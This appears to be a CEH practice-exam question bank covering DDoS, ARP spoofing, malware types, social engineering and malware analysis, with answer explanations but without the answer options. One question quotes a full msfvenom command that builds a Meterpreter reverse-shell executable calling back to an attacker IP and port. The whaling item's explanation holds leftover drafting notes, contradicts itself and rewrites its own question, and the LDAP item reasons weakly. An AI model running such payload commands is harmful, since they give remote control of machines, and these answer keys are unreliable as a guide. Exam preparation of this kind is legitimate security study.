Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?
Amplification uses reflectors to multiply traffic.
75 of 216 questions · Page 1/3 · Ceh Malware Social Network topic · Answers revealed
Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?
Amplification uses reflectors to multiply traffic.
A network administrator notices that the ARP cache on several workstations contains entries mapping the default gateway IP to an unknown MAC address. Users report intermittent connectivity issues. Which tool is MOST likely being used to perform this attack?
Ettercap is specifically designed for ARP poisoning and MITM attacks.
Which TWO of the following are examples of application-layer DDoS attacks? (Select 2)
Correct. HTTP flood sends many HTTP requests at the application layer.
SYN cookies encode connection state in the SYN-ACK, allowing the server to avoid resource allocation until the handshake completes.
Why this answer
SYN flood attacks exploit the TCP three-way handshake by sending many SYN packets without completing the handshake. SYN cookies allow the server to avoid storing half-open connections, effectively mitigating SYN floods.
Which TWO of the following are characteristics of a polymorphic virus? (Select 2)
Correct. Polymorphic viruses mutate their code.
Why this answer
Polymorphic viruses change their code signature each time they replicate, making detection difficult. They often use encryption to hide malicious code.
Which THREE of the following are techniques used in session hijacking?
MITM attacks allow the attacker to intercept and manipulate session data.
Why this answer
Man-in-the-middle (MITM) interception is a core session hijacking technique where the attacker positions themselves between the client and server to intercept and manipulate traffic. By capturing session tokens or credentials in transit, the attacker can impersonate the legitimate user without needing to predict sequence numbers or steal cookies directly.
Exam trap
EC-Council often tests the distinction between attacks that enable session hijacking (like MITM) versus attacks that are merely precursors or different categories (like DNS poisoning or MAC flooding), so candidates mistakenly select options that facilitate but do not directly perform session hijacking.
Correct. The large responses and random subdomains indicate an amplification attack.
Why this answer
A DNS amplification attack uses open DNS resolvers to send large responses to a spoofed victim IP. The random subdomains are used to generate large responses, and the outbound queries are from the internal host acting as reflector.
Which TWO of the following are effective mitigation techniques against DDoS attacks? (Select two)
Rate limiting restricts the number of requests from a source, mitigating DDoS.
Why this answer
Rate limiting limits traffic per source, and scrubbing centers filter malicious traffic. Anycast distributes traffic, and blackholing drops traffic, but rate limiting and scrubbing are direct mitigations.
Which of the following is a tool commonly used for MAC flooding attacks to force a switch into fail-open mode, allowing sniffing of all traffic on the network?
macof is specifically designed for MAC flooding.
Why this answer
macof (part of the dsniff suite) floods a switch with many fake MAC addresses, exhausting the CAM table and causing the switch to flood traffic out all ports.
A security analyst notices that an internal server is sending a high volume of DNS queries to external servers for non-existent domains. Which type of malware behavior is MOST likely being observed?
Worms often generate network traffic, including DNS queries, as they attempt to find and infect new hosts.
Why this answer
A worm self-replicates across the network, often generating unusual DNS queries as it spreads.
A penetration tester receives an email that appears to be from the company's CEO, urgently requesting that the tester click a link to review a document. The email contains several grammatical errors and the sender's address is slightly misspelled. Which type of social engineering attack is this MOST likely?
Whaling is a form of spear phishing that targets senior executives, often with urgent requests.
Why this answer
Whaling targets high-level executives (like the CEO) with personalized phishing emails. The urgency and impersonation of a CEO are classic whaling indicators.
A security analyst detects an ongoing DDoS attack where the attacker sends a large number of ICMP echo request packets with spoofed source IP addresses to a network's broadcast address. The attack overwhelms the target with responses from all hosts on the network. Which attack type is this?
Smurf uses ICMP echo requests to broadcast address with spoofed source, causing amplification.
Why this answer
A Smurf attack sends ICMP echo requests to the network broadcast address with the victim's spoofed source IP, causing all hosts to reply to the victim, amplifying traffic.
Which tool is commonly used for ARP spoofing attacks to perform man-in-the-middle (MITM) attacks on a local network?
Why this answer
Ettercap is a well-known suite for ARP poisoning, enabling MITM attacks. It can intercept traffic between hosts on a switched network.
A security analyst notices that a web server is experiencing slow response times, and the connection logs show many incomplete HTTP requests from various IP addresses, each keeping connections open for long periods. Which attack is MOST likely occurring?
Slowloris partially sends HTTP headers and keeps connections open.
Why this answer
Slowloris is a low-bandwidth application-layer DoS attack that keeps many connections open by sending partial HTTP requests, exhausting server resources.
Which type of malware is designed to replicate itself across networks without requiring a host file, often exploiting vulnerabilities to spread?
Worms self-replicate without host files.
Why this answer
Worms are standalone malware that self-replicate and spread over networks.
During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?
Correct. A backdoor Trojan provides unauthorized remote access to the system.
Why this answer
A Remote Access Trojan (RAT) provides the attacker with remote control over the victim machine, often with features for persistence and stealth.
A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?
Slowloris sends slow partial HTTP headers to keep connections open.
Why this answer
Slowloris is an application-layer DDoS attack that holds connections open by sending partial HTTP requests, exhausting server connection pools. It uses many sources and slow sending.
Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)
Polymorphic viruses mutate to avoid detection.
Why this answer
Polymorphic viruses change their code signature each time they replicate, using mutation engines to evade signature detection.
Which tool is specifically designed to automate social engineering attacks, such as phishing and credential harvesting?
SET is the Social Engineering Toolkit, designed for automating social engineering attacks.
Why this answer
The Social Engineering Toolkit (SET) is a well-known framework for automating social engineering attacks.
A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?
Correct. A SYN flood sends many SYN packets with no final ACK, overwhelming the target.
Why this answer
A SYN flood sends many SYN packets without completing the handshake, exhausting target resources. The attacker's server is the source, indicating it is being used to launch the attack.
After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?
CreateRemoteThread and WriteProcessMemory are used to inject code into a remote process.
Why this answer
These Windows API functions are commonly used for process injection, where code is written into another process's memory and executed. This is a common malware technique to evade detection.
Which TWO of the following are examples of application layer DDoS attacks? (Select two.)
Correct. Slowloris keeps many connections open to exhaust server resources.
Why this answer
Slowloris and HTTP flood are application layer attacks that target web servers by exhausting connections or sending high volumes of HTTP requests.
Which THREE of the following are techniques used in session hijacking? (Select three.)
Correct. ARP poisoning enables MITM, which can be used to hijack sessions.
Which of the following tools is specifically designed for ARP poisoning and can be used to perform man-in-the-middle attacks on a local network?
Why this answer
Ettercap is a comprehensive suite for man-in-the-middle attacks on LAN, featuring ARP poisoning capabilities. Wireshark is a packet analyzer, Nmap is a network scanner, and Metasploit is an exploitation framework.
Which of the following is a characteristic of a polymorphic virus?
Correct. Polymorphic viruses mutate their code to avoid signature-based detection.
Why this answer
Polymorphic viruses change their code signature each time they replicate, making signature-based detection difficult.
Which TWO of the following are examples of application-layer DDoS attacks?
Slowloris keeps many connections open by sending partial HTTP requests.
A security analyst executes the command 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe' and transfers the file to a target. Which technique is being used?
The payload is a backdoor that allows remote control, characteristic of a Trojan.
Why this answer
Msfvenom generates a payload. The payload 'windows/meterpreter/reverse_tcp' creates a reverse shell that connects back to the attacker's IP and port. This is a classic Trojan/backdoor, specifically a remote access Trojan (RAT).
During a penetration test, a security analyst captures network traffic and observes a series of ARP replies without corresponding ARP requests. An internal host's IP address is suddenly associated with two different MAC addresses. Which attack is MOST likely occurring?
ARP poisoning sends unsolicited ARP replies to map an IP to a different MAC, enabling MITM.
Why this answer
ARP poisoning (also known as ARP spoofing) involves sending forged ARP replies to associate an IP with a different MAC, enabling MITM attacks. The other options do not fit the ARP reply pattern.
A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?
HTTP GET requests targeting a specific page are application-layer.
A security analyst receives an alert about a workstation repeatedly sending large volumes of ICMP echo request packets to a broadcast address. Which type of attack is this indicative of?
ICMP to broadcast addresses with spoofed source IP.
Why this answer
A Smurf attack uses ICMP echo requests to a broadcast address, causing all hosts to reply and flood the victim.
Which TWO of the following are types of malware that specifically aim to demand payment from victims?
Scareware displays fake alerts to trick users into paying for removal.
Why this answer
Ransomware encrypts files and demands ransom; scareware tricks users into paying for fake threats.
Which type of malware spreads by replicating itself across a network without requiring a host file to attach to?
Worms self-propagate across networks independently.
Why this answer
Worms are standalone malware that self-replicate and spread across networks. Viruses require a host file, Trojans disguise as legitimate software, and ransomware focuses on encryption.
Which of the following tools is commonly used for dynamic malware analysis by executing the malware in an isolated environment and monitoring system changes?
Cuckoo Sandbox is a dynamic analysis tool that executes malware in a sandbox and monitors behavior.
Why this answer
Cuckoo Sandbox is a popular open-source automated malware analysis system that runs samples in an isolated environment and reports behavior.
Which type of malware encrypts the victim's files and demands payment for the decryption key?
Correct. Ransomware encrypts files and demands ransom.
Why this answer
Ransomware is designed to encrypt files and demand ransom for the decryption key.
During a penetration test, you discover a process named 'svch0st.exe' running on a Windows server with high CPU usage. The file is not digitally signed. Which type of malware is MOST likely present?
The process masquerades as a legitimate service (svchost.exe) to avoid detection, typical of a Trojan or backdoor.
Why this answer
The name 'svch0st.exe' mimics 'svchost.exe', a legitimate Windows process. Such masquerading is common with Trojans and backdoors. The absence of a digital signature and high CPU usage suggests malicious activity.
A Trojan or backdoor is most likely.
A security analyst uses a tool to capture packets in promiscuous mode on a network segment. The analyst notices that only traffic to and from the analyst's machine is captured, not all traffic on the segment. What is the most likely reason?
Switches send frames only to the specific port, making sniffing difficult without additional techniques.
Why this answer
A switch only forwards traffic to the port where the destination MAC resides; promiscuous mode only affects the local NIC, not switch behavior.
Which TWO of the following are examples of protocol-based DoS attacks? (Choose two.)
Smurf attack uses ICMP echo requests with spoofed source IP.
Why this answer
SYN flood and Smurf attack exploit TCP/IP protocol weaknesses.
An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?
SMiShing is phishing via SMS.
Why this answer
SMiShing (SMS phishing) is a phishing attack conducted via SMS text messages. The message uses urgency to trick the recipient into revealing credentials.
Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
Ransomware encrypts files and demands payment for decryption.
Why this answer
Ransomware is specifically designed to encrypt files and demand ransom. The other options do not typically encrypt files for ransom.
Which tool is specifically designed to create and manage phishing campaigns for security awareness testing?
SET is the Social Engineering Toolkit.
Why this answer
The Social Engineering Toolkit (SET) is a framework for social engineering attacks, including phishing.
An attacker sends an email that appears to come from the CEO, requesting that the recipient urgently transfer funds to a specified account. Which type of social engineering attack is this?
Whaling targets high-profile executives like the CFO, often with CEO impersonation.
Why this answer
Whaling targets high-profile individuals like executives. Spear phishing targets specific individuals, but whaling is specifically aimed at whales (big fish). The email from the CEO targeting an employee would be spear phishing, but the term 'whaling' is used when the target is a high-level executive.
However, the email is from the CEO, so the attacker is impersonating a whale. Actually, whaling is when the target is a whale. Here the target is not necessarily a whale.
The best answer is 'Spear phishing' because it's targeted. But the question says 'appears to come from the CEO' – that's impersonation. 'Pretexting' involves fabricating a scenario. 'Phishing' is generic. 'Spear phishing' is targeted. I'll go with 'Spear phishing' as the most accurate.
I'll correct scenario: An attacker sends an email to a CFO appearing to be from the CEO. That's whaling. Let me adjust the stem to make it clear: 'An attacker sends an email to the company CFO that appears to come from the CEO, requesting an urgent wire transfer.
Which type of social engineering attack is this?' Then the answer is 'Whaling'.
A network administrator notices an unusual amount of traffic on port 389 from an internal server to multiple external IP addresses. Which type of malware might be present?
A backdoor Trojan may use LDAP for covert communication.
Why this answer
Port 389 is used by LDAP. Outbound traffic to multiple external IPs could indicate LDAP query-based command and control or data exfiltration, but more commonly, port 389 is associated with directory services. However, in malware context, it could be a sign of a backdoor or RAT using LDAP for C2.
The most likely is that the malware is using LDAP for communication, but given options, a Trojan backdoor is plausible.
Which TWO types of malware typically require user interaction (e.g., opening a file or clicking a link) to activate? (Select two.)
Often delivered via phishing links or attachments requiring user interaction.
Why this answer
Trojans typically require user interaction to execute, and ransomware often requires user action (clicking a link or opening an attachment) to trigger. Worms and polymorphic viruses can spread without user interaction, though viruses generally need a host file.
Which THREE of the following are indicators that a system may be infected with a backdoor Trojan? (Select three)
Backdoors often use ports like 4444, 1337 for communication.
Why this answer
Backdoor Trojans often cause unusual network connections to unknown IPs, unexpected outbound traffic, and unauthorized processes running. High CPU usage alone could be other malware, but combined with network activity it's indicative.
Which THREE of the following are techniques used in static malware analysis? (Select 3)
This is static analysis.
Why this answer
Static analysis examines the binary without execution. Inspecting file metadata, searching for suspicious strings, and analyzing the file's structure (e.g., using PEiD) are static techniques. Monitoring registry changes and network connections require execution (dynamic analysis).
Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)
Dedicated infrastructure filters out attack traffic.
Why this answer
Rate limiting restricts traffic per source, scrubbing centers filter malicious traffic, and anycast disperses traffic across multiple nodes to absorb attacks.
Multiple sources sending ICMP echo requests with spoofed IPs is a classic ICMP flood, a volumetric DoS.
Why this answer
A distributed ICMP flood (ping flood) uses multiple sources to overwhelm a target with ICMP echo requests. Spoofed source addresses and varying packet sizes are common characteristics.
Attackers send small queries with spoofed source IP to open DNS resolvers, which reply with large responses to the victim.
Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?
Wireshark captures and analyzes packets.
Why this answer
Wireshark is the standard tool for capturing and analyzing network packets in pcap format.
Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?
Ransomware encrypts files and demands ransom.
Why this answer
Ransomware encrypts files and demands ransom, typically in cryptocurrency.
Which TWO of the following are techniques used in session hijacking attacks? (Choose two.)
Attackers can predict sequence numbers to hijack a TCP session.
Why this answer
TCP sequence prediction is a core technique in session hijacking where an attacker predicts or sniffs the TCP sequence numbers used by the client and server to inject forged packets and take over an established TCP session. By correctly guessing the next sequence number, the attacker can spoof the client's IP address and send malicious commands that the server accepts as legitimate traffic.
Which THREE of the following are characteristics of a DNS amplification DDoS attack? (Select three.)
Queries are sent with the victim's IP as source so responses go to victim.
Why this answer
DNS amplification uses open DNS resolvers, spoofs the victim's IP, and exploits small queries to generate large responses, thereby amplifying traffic.
Which type of malware is characterized by being able to change its code signature each time it replicates to evade signature-based detection?
Polymorphic viruses change their code to evade signature detection.
Why this answer
Polymorphic viruses change their code signature (using mutation engines) each replication to avoid detection.
Which TWO of the following are examples of amplification attacks used in DDoS?
DNS amplification uses small queries to generate large responses.
Which of the following malware types is characterized by self-replication without requiring a host file or program, and spreading across networks automatically?
Worms are self-replicating and spread automatically.
Why this answer
Worms are standalone self-replicating malware that spread across networks without needing to attach to host files.
An analyst observes that a web server is receiving many HTTP GET requests with random parameter values, each request taking a long time to complete. The server's connection pool is exhausted, and legitimate users cannot access the site. Which attack is MOST likely occurring?
Slowloris sends incomplete HTTP requests to keep connections open, exhausting connection pool.
Why this answer
Slowloris sends partial HTTP requests to keep connections open, exhausting the server's connection pool.
An organization wants to mitigate the impact of a DDoS attack by distributing incoming traffic across multiple servers in different geographic locations. Which technique is BEST suited?
Anycast distributes traffic across multiple nodes based on routing protocols.
Why this answer
Anycast routing allows traffic to be directed to the nearest or best-performing server among multiple locations, helping absorb DDoS traffic.
An organization wants to protect against DNS spoofing attacks. Which security measure is MOST effective in preventing an attacker from poisoning DNS cache entries?
DNSSEC validates DNS responses.
Why this answer
DNSSEC adds cryptographic signatures to DNS data, preventing spoofed responses.
Which THREE of the following are effective DDoS mitigation techniques? (Select 3)
Why this answer
Rate limiting restricts traffic volume, scrubbing centers filter malicious traffic, and anycast distributes traffic across multiple servers.
A company's security team wants to deploy a DDoS mitigation technique that distributes incoming traffic across multiple servers in different geographic locations, making it harder for an attacker to overwhelm a single target. Which technique BEST fits this description?
Anycast distributes traffic to multiple locations, mitigating volumetric attacks.
Why this answer
Anycast routing allows multiple servers to share the same IP address; traffic flows to the nearest server, distributing the load and absorbing DDoS attacks.
An attacker gains physical access to a building by following an authorized employee through a secure door without using a badge. Which social engineering technique is being used?
Tailgating is physically following someone through a secure entrance.
Why this answer
Tailgating is when an unauthorized person follows an authorized individual into a restricted area without consent. It is a physical security breach.
Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?
Ransomware encrypts files and demands ransom.
Why this answer
Ransomware encrypts files and demands payment for decryption. Examples include CryptoLocker, WannaCry, and Locky.
A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?
Correct. Smurf uses broadcast amplification and spoofed source IP to flood the victim.
Why this answer
A Smurf attack sends ICMP echo requests to a broadcast address with the victim's spoofed source IP, causing all hosts on the subnet to reply to the victim, overwhelming it.
An employee receives an email that appears to be from the company's CEO, requesting an urgent wire transfer to a vendor. The email address is slightly different from the CEO's actual address. Which type of social engineering attack is this?
Whaling targets senior executives with personalized attacks.
Why this answer
Whaling is a spear-phishing attack targeting senior executives, often with requests for wire transfers or sensitive information.
A security analyst notices that the ARP cache on a workstation contains multiple entries for the same IP address with different MAC addresses. Which attack is likely occurring?
ARP poisoning causes multiple MAC entries for one IP due to forged ARP replies.
Why this answer
Multiple MAC addresses for one IP in the ARP cache is a sign of ARP spoofing/poisoning, where an attacker sends forged ARP replies to associate their MAC with the victim's IP.
A security team discovers a file named 'svchost.exe' in a user's Temp folder. The file is signed by 'Microsoft Corporation' but the digital signature validation fails. Which analysis method should be used FIRST to determine if it's malicious?
Correct. Static analysis can reveal suspicious strings, packed executables, or invalid signatures without execution.
Why this answer
Static analysis (e.g., examining strings, digital signatures, PE headers) is the first step because it is safe and can quickly identify suspicious indicators without executing the file.
Which TWO of the following are types of malware analysis? (Select two.)
Correct. Static analysis reviews code and structure without execution.
Why this answer
Static analysis examines the file without executing it (e.g., examining strings, headers). Dynamic analysis executes the malware in a controlled environment (sandbox) to observe behavior.
An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?
Scrubbing centers can analyze and filter out malicious UDP traffic while allowing legitimate traffic.
Why this answer
Scrubbing centers filter malicious traffic from legitimate traffic, effectively mitigating volumetric DDoS attacks.
During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?
MAC flooding fills the switch's MAC address table, causing it to broadcast frames.
Why this answer
MAC flooding attacks send many fake MAC addresses to overflow the switch's MAC table, forcing it into hub mode and allowing traffic sniffing.
Which TWO tools are commonly used for ARP poisoning attacks?
Cain & Abel is a Windows tool that includes ARP poisoning capabilities.
Why this answer
Ettercap and Cain & Abel are well-known tools for ARP poisoning, allowing attackers to intercept traffic on a LAN.
Which THREE of the following are common indicators of a man-in-the-middle attack using ARP spoofing? (Choose three.)
ARP spoofing assigns the same IP to multiple MAC addresses, causing duplicates.
A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?
Targeted emails with personalized context and spoofed domain indicate spear phishing.
Why this answer
Spear phishing targets specific individuals or organizations with personalized content. The misspelled domain and urgency are classic spear phishing indicators.
Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?
Polymorphic viruses change their code on each infection.
Why this answer
Polymorphic malware changes its code (but retains functionality) to avoid detection by signature-based antivirus.
An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?
Whaling targets senior executives with personalized scams.
Why this answer
Whaling targets senior executives (like the CEO) with personalized phishing emails, often involving financial fraud.
Which TWO of the following are examples of static malware analysis techniques? (Select two.)
VirusTotal uses static signatures.
Why this answer
Static analysis examines the malware without executing it. String analysis looks for embedded strings, and VirusTotal checks hashes against known signatures. Sandboxing and process monitoring are dynamic analysis.
Ready to test yourself?
Try a timed practice session using only Ceh Malware Social Network questions.